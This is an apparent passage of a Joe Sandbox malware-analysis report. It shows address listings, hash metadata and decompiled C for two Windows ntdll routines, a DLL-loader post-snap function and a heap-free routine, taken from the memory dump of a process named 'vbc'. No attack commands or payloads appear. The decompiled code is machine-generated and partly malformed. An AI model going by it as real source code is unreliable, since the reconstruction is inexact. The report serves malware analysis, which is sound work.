                                                  0x016215da
                                                  0x016215dc
                                                  0x016215dc
                                                  0x016215dc
                                                  0x016215da
                                                  0x016215e5
                                                  0x016215e9
                                                  0x016215ee
                                                  0x016215f1
                                                  0x016215f3
                                                  0x016215f9
                                                  0x01621600
                                                  0x01621604
                                                  0x01621624
                                                  0x01621629
                                                  0x01621606
                                                  0x0162161c
                                                  0x01621621
                                                  0x01621637
                                                  0x0162163e
                                                  0x01621643
                                                  0x01621649
                                                  0x0162164c
                                                  0x01621650
                                                  0x01621656
                                                  0x0162165d
                                                  0x0162165e
                                                  0x0162165e
                                                  0x01621650
                                                  0x016215f3
                                                  0x015d9af4
                                                  0x015d9af7
                                                  0x015d9afc
                                                  0x015d9b00
                                                  0x015d9b04
                                                  0x015d9b08
                                                  0x015d9b14
                                                  0x015d99fe
                                                  0x015d9a04
                                                  0x015d9a07
                                                  0x00000000
                                                  0x015d9a29
                                                  0x0162169c
                                                  0x016216a0
                                                  0x016216a5
                                                  0x016216a9
                                                  0x016216b5
                                                  0x016216ba
                                                  0x016216bc
                                                  0x016216be
                                                  0x016216c3
                                                  0x016216c3
                                                  0x016216bc
                                                  0x016216c8
                                                  0x016216cc
                                                  0x0162181b
                                                  0x0162181b
                                                  0x0162181e
                                                  0x0162181e
                                                  0x01621821
                                                  0x01621823
                                                  0x01621826
                                                  0x01621829
                                                  0x0162182c
                                                  0x0162182e
                                                  0x01621688
                                                  0x01621688
                                                  0x01621689
                                                  0x0162168b
                                                  0x0162168c
                                                  0x0162168d
                                                  0x0162168f
                                                  0x01621692
                                                  0x00000000
                                                  0x01621692
                                                  0x01621834
                                                  0x01621836
                                                  0x00000000
                                                  0x00000000
                                                  0x0162183f
                                                  0x01621842
                                                  0x01621848
                                                  0x0162184a
                                                  0x01621875
                                                  0x01621875
                                                  0x01621878
                                                  0x0162187b
                                                  0x0162187d
                                                  0x01621880
                                                  0x01621884
                                                  0x016218a7
                                                  0x016218a7
                                                  0x016218aa
                                                  0x016218ad
                                                  0x016218b6
                                                  0x016218bd
                                                  0x016218c0
                                                  0x016218c3
                                                  0x016218c5
                                                  0x016218c8
                                                  0x016218ca
                                                  0x016218ca
                                                  0x016218cd
                                                  0x016218cd
                                                  0x016218c8
                                                  0x016218d5
                                                  0x016218da
                                                  0x016218df
                                                  0x016218e2
                                                  0x016218e5
                                                  0x016218e7
                                                  0x016218ee
                                                  0x016218f2
                                                  0x01621912
                                                  0x01621917
                                                  0x016218f4
                                                  0x0162190a
                                                  0x0162190f
                                                  0x01621925
                                                  0x0162192c
                                                  0x01621931
                                                  0x0162193a
                                                  0x0162193e
                                                  0x01621940
                                                  0x01621947
                                                  0x01621948
                                                  0x01621948
                                                  0x0162193e
                                                  0x016218e5
                                                  0x0162194f
                                                  0x01621952
                                                  0x01621956
                                                  0x0162195d
                                                  0x01621961
                                                  0x0162196d
                                                  0x00000000
                                                  0x0162196d
                                                  0x0162188a
                                                  0x0162188f
                                                  0x01621891
                                                  0x00000000
                                                  0x00000000
                                                  0x0162189d
                                                  0x00000000
                                                  0x0162189d
                                                  0x0162184c
                                                  0x01621859
                                                  0x01621859
                                                  0x0162185c
                                                  0x00000000
                                                  0x00000000
                                                  0x01621851
                                                  0x01621853
                                                  0x01621855
                                                  0x01621865
                                                  0x01621865
                                                  0x01621866
                                                  0x01621868
                                                  0x01621870
                                                  0x00000000
                                                  0x01621870
                                                  0x01621857
                                                  0x01621857
                                                  0x0162185e
                                                  0x00000000
                                                  0x016216d2
                                                  0x016216d2
                                                  0x016216d5
                                                  0x016216d5
                                                  0x016216d8
                                                  0x016216da
                                                  0x016216dd
                                                  0x016216e0
                                                  0x016216e3
                                                  0x016216e5
                                                  0x01621808
                                                  0x01621808
                                                  0x01621809
                                                  0x01621812
                                                  0x01621817
                                                  0x01621817
                                                  0x00000000
                                                  0x01621817
                                                  0x016216eb
                                                  0x016216ed
                                                  0x00000000
                                                  0x00000000
                                                  0x016216f6
                                                  0x016216f9
                                                  0x016216ff
                                                  0x01621701
                                                  0x0162172c
                                                  0x0162172c
                                                  0x0162172f
                                                  0x01621732
                                                  0x01621734
                                                  0x01621737
                                                  0x0162173b
                                                  0x0162175e
                                                  0x0162175e
                                                  0x01621761
                                                  0x01621764
                                                  0x0162176d
                                                  0x01621774
                                                  0x01621777
                                                  0x0162177a
                                                  0x0162177c
                                                  0x0162177f
                                                  0x01621781
                                                  0x01621781
                                                  0x01621784
                                                  0x01621784
                                                  0x0162177f
                                                  0x0162178c
                                                  0x01621791
                                                  0x01621796
                                                  0x01621799
                                                  0x0162179c
                                                  0x0162179e
                                                  0x016217a5
                                                  0x016217a9
                                                  0x016217c9
                                                  0x016217ce
                                                  0x016217ab
                                                  0x016217c1
                                                  0x016217c6
                                                  0x016217dc
                                                  0x016217e3
                                                  0x016217e8
                                                  0x016217ee
                                                  0x016217f1
                                                  0x016217f5
                                                  0x016217f7
                                                  0x016217fe
                                                  0x016217ff
                                                  0x016217ff
                                                  0x016217f5
                                                  0x0162179c
                                                  0x00000000
                                                  0x01621764
                                                  0x01621741
                                                  0x01621746
                                                  0x01621748
                                                  0x00000000
                                                  0x00000000
                                                  0x01621754
                                                  0x00000000
                                                  0x01621754
                                                  0x01621703
                                                  0x01621710
                                                  0x01621710
                                                  0x01621713
                                                  0x00000000
                                                  0x00000000
                                                  0x01621708
                                                  0x0162170a
                                                  0x0162170c
                                                  0x0162171c
                                                  0x0162171c
                                                  0x0162171d
                                                  0x0162171f
                                                  0x01621727
                                                  0x00000000
                                                  0x01621727
                                                  0x0162170e
                                                  0x0162170e
                                                  0x01621715
                                                  0x00000000
                                                  0x01621715
                                                  0x016216cc
                                                  0x015d9a45
                                                  0x015d9a45
                                                  0x015d9a0e
                                                  0x015d9a1c
                                                  0x015d9a23
                                                  0x0162167e
                                                  0x0162167f
                                                  0x01621681
                                                  0x01621683
                                                  0x01621684
                                                  0x00000000
                                                  0x01621684
                                                  0x00000000
                                                  0x015d9aad
                                                  0x015d9aad
                                                  0x015d9ab0
                                                  0x015d9ab3
                                                  0x015d9ab3
                                                  0x015d9ab6
                                                  0x00000000
                                                  0x00000000
                                                  0x015d9ab8
                                                  0x015d9aba
                                                  0x015d9abc
                                                  0x015d9ac8
                                                  0x015d9ac8
                                                  0x00000000
                                                  0x015d9abe
                                                  0x015d9abe
                                                  0x015d9ac0
                                                  0x00000000
                                                  0x015d9ac0
                                                  0x015d9abc
                                                  0x015d9ad2
                                                  0x00000000
                                                  0x015d9ad2
                                                  0x015d9aab

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                  • API String ID: 0-3178619729
                                                  • Opcode ID: 53e32f35abd71d7e801af3aa43dbaad1dc1930bf30235dc7b82deeb432c04012
                                                  • Instruction ID: c06c9969d0e454ba570fb5068a81a507e666f03474007193e45e9c271daa66d7
                                                  • Opcode Fuzzy Hash: 53e32f35abd71d7e801af3aa43dbaad1dc1930bf30235dc7b82deeb432c04012
                                                  • Instruction Fuzzy Hash: 852211706046529FEB25CF2CC884B7ABBF5FF46704F188569E8468B382E775D881CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015C8794 Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 83%
                                                  			E015C8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E015C934A() != 0) {
								_t159 = E0163A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x16a5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01635510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x16a5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E015C849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E015C8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E015C8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x16a5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x16a5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E015D2280(_t92, 0x16a86cc);
															_t94 = E01689DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E015E61A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x16a5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E015C8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x16a5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x16a5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E015FF380(_t136, 0x1591184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E015D2280(_t108, 0x16a86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E015E61A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E01689D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E015CFFB0(_t118, _t156, 0x16a86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E015F9A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}












































                                                  0x015c8799
                                                  0x015c879d
                                                  0x015c87a1
                                                  0x015c87a3
                                                  0x015c87a8
                                                  0x015c87c3
                                                  0x015c87c3
                                                  0x015c87c8
                                                  0x015c87d1
                                                  0x015c87d4
                                                  0x015c87d8
                                                  0x015c87e5
                                                  0x015c87ec
                                                  0x01619bfe
                                                  0x01619c00
                                                  0x01619c02
                                                  0x01619c08
                                                  0x01619c0d
                                                  0x01619c0f
                                                  0x01619c14
                                                  0x01619c2d
                                                  0x01619c32
                                                  0x01619c37
                                                  0x01619c3a
                                                  0x01619c3c
                                                  0x01619c42
                                                  0x01619c42
                                                  0x01619c3c
                                                  0x01619c02
                                                  0x015c87da
                                                  0x015c87df
                                                  0x015c87e3
                                                  0x00000000
                                                  0x00000000
                                                  0x015c87e3
                                                  0x015c87f2
                                                  0x00000000
                                                  0x015c87fb
                                                  0x015c87fd
                                                  0x015c87fe
                                                  0x015c880e
                                                  0x015c880f
                                                  0x015c8810
                                                  0x015c8814
                                                  0x015c881a
                                                  0x015c881c
                                                  0x015c881f
                                                  0x015c8821
                                                  0x015c8822
                                                  0x015c8824
                                                  0x015c8826
                                                  0x015c882c
                                                  0x015c882e
                                                  0x01619c48
                                                  0x01619c48
                                                  0x015c8834
                                                  0x015c8834
                                                  0x015c8837
                                                  0x00000000
                                                  0x00000000
                                                  0x015c8837
                                                  0x015c882e
                                                  0x015c883d
                                                  0x015c8840
                                                  0x015c8843
                                                  0x015c8846
                                                  0x015c8849
                                                  0x015c884c
                                                  0x015c884e
                                                  0x015c8850
                                                  0x015c8852
                                                  0x015c8854
                                                  0x015c8857
                                                  0x015c88b4
                                                  0x015c88b6
                                                  0x015c88b6
                                                  0x015c8859
                                                  0x015c8859
                                                  0x015c8859
                                                  0x015c8861
                                                  0x015c8866
                                                  0x015c886a
                                                  0x015c893d
                                                  0x015c8941
                                                  0x00000000
                                                  0x015c8947
                                                  0x015c8947
                                                  0x015c894a
                                                  0x015c894c
                                                  0x00000000
                                                  0x015c8952
                                                  0x015c8955
                                                  0x015c895a
                                                  0x015c895d
                                                  0x015c895d
                                                  0x015c895f
                                                  0x015c8961
                                                  0x015c8961
                                                  0x015c8968
                                                  0x00000000
                                                  0x00000000
                                                  0x015c896a
                                                  0x015c896b
                                                  0x015c896e
                                                  0x00000000
                                                  0x015c8970
                                                  0x015c8970
                                                  0x015c8970
                                                  0x015c8970
                                                  0x015c8972
                                                  0x015c8972
                                                  0x015c8974
                                                  0x00000000
                                                  0x015c897a
                                                  0x015c897a
                                                  0x015c897d
                                                  0x00000000
                                                  0x015c8983
                                                  0x01619c65
                                                  0x01619c6d
                                                  0x01619c72
                                                  0x01619c75
                                                  0x01619c75
                                                  0x01619c82
                                                  0x01619c86
                                                  0x01619c87
                                                  0x01619c88
                                                  0x01619c89
                                                  0x01619c8c
                                                  0x01619c90
                                                  0x01619c95
                                                  0x01619c97
                                                  0x01619ca0
                                                  0x01619ca3
                                                  0x01619ca9
                                                  0x01619ca9
                                                  0x00000000
                                                  0x01619ca9
                                                  0x01619ca3
                                                  0x00000000
                                                  0x01619c97
                                                  0x015c897d
                                                  0x00000000
                                                  0x015c8974
                                                  0x015c8988
                                                  0x015c8992
                                                  0x015c8996
                                                  0x00000000
                                                  0x015c8996
                                                  0x015c894c
                                                  0x00000000
                                                  0x015c8870
                                                  0x015c887b
                                                  0x015c887d
                                                  0x015c887f
                                                  0x015c8881
                                                  0x015c8884
                                                  0x015c8884
                                                  0x015c8886
                                                  0x015c8889
                                                  0x015c888c
                                                  0x015c888e
                                                  0x015c8891
                                                  0x015c8891
                                                  0x015c8898
                                                  0x00000000
                                                  0x00000000
                                                  0x015c889a
                                                  0x015c889b
                                                  0x015c889e
                                                  0x00000000
                                                  0x00000000
                                                  0x015c88a0
                                                  0x015c88a8
                                                  0x015c88b0
                                                  0x015c88b2
                                                  0x015c88d3
                                                  0x015c88d5
                                                  0x00000000
                                                  0x015c88d7
                                                  0x015c88db
                                                  0x015c88dc
                                                  0x015c88e0
                                                  0x015c88e8
                                                  0x015c88ee
                                                  0x015c88f0
                                                  0x015c88f3
                                                  0x015c88fc
                                                  0x015c8901
                                                  0x015c8906
                                                  0x015c890c
                                                  0x015c890c
                                                  0x015c890f
                                                  0x015c8916
                                                  0x015c8917
                                                  0x015c8918
                                                  0x015c8919
                                                  0x015c891a
                                                  0x015c891f
                                                  0x015c8921
                                                  0x01619c52
                                                  0x01619c55
                                                  0x01619c5b
                                                  0x01619cac
                                                  0x01619cc0
                                                  0x01619cc0
                                                  0x01619c55
                                                  0x015c8927
                                                  0x015c8927
                                                  0x015c892f
                                                  0x015c8933
                                                  0x00000000
                                                  0x015c88f5
                                                  0x015c88f5
                                                  0x00000000
                                                  0x015c88f7
                                                  0x015c88f7
                                                  0x015c88fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015c88fa
                                                  0x015c88f5
                                                  0x015c88f3
                                                  0x00000000
                                                  0x015c88d5
                                                  0x00000000
                                                  0x015c88b2
                                                  0x015c88c9
                                                  0x00000000
                                                  0x015c88c9
                                                  0x015c887f
                                                  0x015c886a
                                                  0x015c8857
                                                  0x015c8852
                                                  0x015c88bf
                                                  0x015c88bf
                                                  0x015c87aa
                                                  0x015c87ad
                                                  0x015c87ae
                                                  0x015c87b4
                                                  0x015c87b5
                                                  0x015c87b6
                                                  0x015c87b8
                                                  0x015c87bd
                                                  0x015c87c1
                                                  0x015c87f4
                                                  0x015c87fa
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x015c87c1
                                                  0x00000000

                                                  Strings
                                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01619C28
                                                  • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01619C18
                                                  • LdrpDoPostSnapWork, xrefs: 01619C1E
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.498700993.0000000001590000.00000040.00000800.00020000.00000000.sdmp, Offset: 01590000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_1590000_vbc.jbxd
                                                  Similarity
                                                  • API ID: InitializeThunk
                                                  • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                  • API String ID: 2994545307-1948996284
                                                  • Opcode ID: 4ec8dfb5579d445e0a3f621305681976ffc66270192a6edf77f5d0262a604fc9
                                                  • Instruction ID: 52ca39883d97c7f6d03526aab92e7b6b27228412deacf9ab5cecdd65b06c8a0f
                                                  • Opcode Fuzzy Hash: 4ec8dfb5579d445e0a3f621305681976ffc66270192a6edf77f5d0262a604fc9
                                                  • Instruction Fuzzy Hash: EB911271A00216AFEF18DF99C880ABEB7B5FF84B14B48456DD905AF641E770ED02CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 015EAC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E015EAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0160D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x16a8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E015F96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01663C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E015F96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E015BB150();
							} else {
								E015BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E015BB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E016714FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E015D7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01671411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E015D7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01671411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                  0x015eac85
                                                  0x015eac88
                                                  0x015eac8a
                                                  0x015eac8d
                                                  0x015eac91
                                                  0x015eac99
                                                  0x015eac9c
                                                  0x01629f57
                                                  0x01629f5b
                                                  0x01629f60
                                                  0x01629f60
                                                  0x015eaca8
                                                  0x015eacae
                                                  0x015eacda
                                                  0x015eacde
                                                  0x015eace8
                                                  0x015eaceb
                                                  0x015eacee
                                                  0x00000000
                                                  0x015eacee
                                                  0x015eacf6
                                                  0x015eacb0
                                                  0x015eacb0
                                                  0x015eacbb
                                                  0x015eacbd
                                                  0x015eacc0
                                                  0x015eacc5
                                                  0x015eadae
                                                  0x015eadb4
                                                  0x015eadb4
                                                  0x015eacd4
                                                  0x015eacd8
                                                  0x015eacf9
                                                  0x015eacff
                                                  0x015ead04
                                                  0x015ead08
                                                  0x015ead09
                                                  0x015ead10
                                                  0x015ead12
                                                  0x015ead18
                                                  0x01629f6f
                                                  0x01629f74
                                                  0x01629f76
                                                  0x01629f7c
                                                  0x01629f84
                                                  0x01629f88
                                                  0x01629f89
                                                  0x01629f90
                                                  0x01629f90
                                                  0x01629f76
                                                  0x015ead1e
                                                  0x015ead24
                                                  0x015ead26
                                                  0x0162a097
                                                  0x0162a09b
                                                  0x0162a0ba
                                                  0x0162a0bf
                                                  0x0162a09d
                                                  0x0162a0b2
                                                  0x0162a0b7
                                                  0x0162a0c5
                                                  0x0162a0c8
                                                  0x0162a0cb
                                                  0x0162a0d2
                                                  0x00000000
                                                  0x015ead2c
                                                  0x015ead2c
                                                  0x015ead2f
                                                  0x015ead34
                                                  0x015ead36
                                                  0x01629f97
                                                  0x01629f9a
                                                  0x00000000
                                                  0x00000000
                                                  0x01629fa9
                                                  0x015ead3e
                                                  0x015ead3e
                                                  0x015ead41
                                                  0x01629fb3
                                                  0x01629fb9
                                                  0x01629fc0
                                                  0x01629fd0
                                                  0x01629fd0
                                                  0x01629fc0
                                                  0x015ead4a
                                                  0x015ead50
                                                  0x015ead5c
                                                  0x015ead62
                                                  0x015ead68
                                                  0x015ead6b
                                                  0x015ead6d
                                                  0x01629fda
                                                  0x01629fdd
                                                  0x00000000
